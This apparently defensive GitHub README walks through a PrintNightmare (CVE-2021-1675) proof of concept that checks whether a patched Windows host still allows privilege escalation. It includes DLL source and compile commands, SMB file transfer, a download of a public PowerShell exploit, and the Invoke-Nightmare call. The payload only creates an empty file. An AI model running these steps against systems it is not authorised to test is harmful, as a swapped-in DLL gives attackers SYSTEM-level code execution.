/PrintNightmare

Information on the Windows Spooler vulnerability - CVE-2021-1675; CVE 2021 34527

Test if you are still vulnerable to PrintNightmare's privesc after patching

PrintNightmare (CVE-2021-1675 / CVE 2021 34527) is an exploit that takes advantage of the AddPrintDriver function of the Spooler to execute files with high-privs.

There is some confusion around the patches released by Microsoft on 6th July 2021. It seems the RCE portion of the exploit is patched, but the privilege escalation may still be vulnerable.

We have put together a step-by-step to run a test PoC to see if the recent patch has been effective for your machine. This guide will do no damage to your machine, neither should it crash the machine or spooler. It will simply write C:\PrintNightmare.txt

Thanks to John Hammond and Caleb Stewart from Huntress for releasing this PowerShell implementation of PrintNightmare

Pre-check

get-service spooler

image

If spooler isn't running, won't be vulnerable, you can quit here and now. Otherwise if running, begin exploitation.

DLL

If you trust us enough, we have a pre-compiled DLL you can download from right here. Please check the hash matches

sha256sum nightmare.dll
#hash should be 894a086c62adbf9181e7c70f06f3d16364ce9019e9b041bc4d39f5c5193d8769

This DLL will just create an innocent, non-malicious file, with no contents:C:\Printnightmare.txt

Otherwise, you are welcome to follow the guidance below to compile the DLL yourself. Clicking the drop-down arrow below will open up compile guidance

Compile non-malicious DLL

Prepare non-Malicious DLL

Run this on your attacker box

Install Dependencies

sudo apt install gcc-mingw-w64
sudo apt install g++-mingw-w64-x86-64

Write the Dll

nano nightmare.cpp

This DLL will just print an innocent, non-malicious file called Printnightmare.txt to C:\

#include <windows.h>

int printy()
{
  WinExec("cmd.exe /c echo > C:\\printnightmare.txt",0);
   return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  printy();
  return 0;
}

Compile DLL

sudo x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL nightmare.cpp         
sudo x86_64-w64-mingw32-g++ -shared -o nightmare.dll nightmare.o -Wl,--out-implib,nightmare.a

image

Transfer DLL however you like, impacket's smbserver.py works

In Kali

sudo impacket-smbserver kali . -smb2support

2021-07-07_09-43

Copy from Kali to in Windows

:: I copied mine into C:\
copy \\yourip\\kali\\nightmare.dll

image

Exploit

Pull Powershell exploit, written by John Hammond and Caleb from Huntress

invoke-webrequest -uri "https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1" -UseBasicParsing -outfile CVE-2021-1675.ps1

Deploy Exploit

import-module .\CVE-2021-1675.ps1
Invoke-Nightmare -DLL "C:\nightmare.dll"

image

Check C:\ for PrintNightmare.txt

image

It doesn't matter what its contents is, it just matters that it exists.

For any questions, comments, and criticisms, please find us on Twitter at LABS or on MAIN